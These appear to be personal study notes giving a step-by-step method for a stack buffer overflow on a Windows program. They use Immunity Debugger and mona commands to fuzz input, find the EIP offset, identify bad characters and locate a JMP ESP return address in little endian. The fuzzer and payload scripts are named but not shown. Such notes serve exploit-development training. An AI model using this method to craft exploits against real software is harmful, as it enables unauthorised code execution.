1. Open inmunity debugger as administrator and open exe

2. Set mona working dir :

!mona config -set workingfolder c:\\mona\\

1. Run Fuzzer Script

Fuzzer Script

1. Generate pattern with last value + 100/200 from Fuzzer script with mona :

!mona pattern_create 2000

1. Copy the pattern from the filesystem and append it to the pattern script

Pattern Script

1. After running pattern , copy EIP value and run mona to obtain offset

!mona pattern_offset <EIP_value>

1. Obtain badchar list with mona, already skipping \x00 and run badchar script

!mona bytearray -b "\\x00"

Badchar

1. Now there are two options to identify badchars, first one click ESP and follow in dump, then see which chars seem to be outliers. Second one , run the following mona command, probably consecutive badchars, only first one is valid, then remove them and recheck.

!mona compare -f C:\\mona\\bytearray.bin -a <ESP_addr>

1. Obtain return address with mona

!mona jmp -r esp
#If Fails, filter by addresses which do not contain badchars
!mona jmp -r esp -cpb "\\x00"

Then convert it to little endian

Addr = 625011AF
retn = "\\xAF\\x11\\x50\\x62"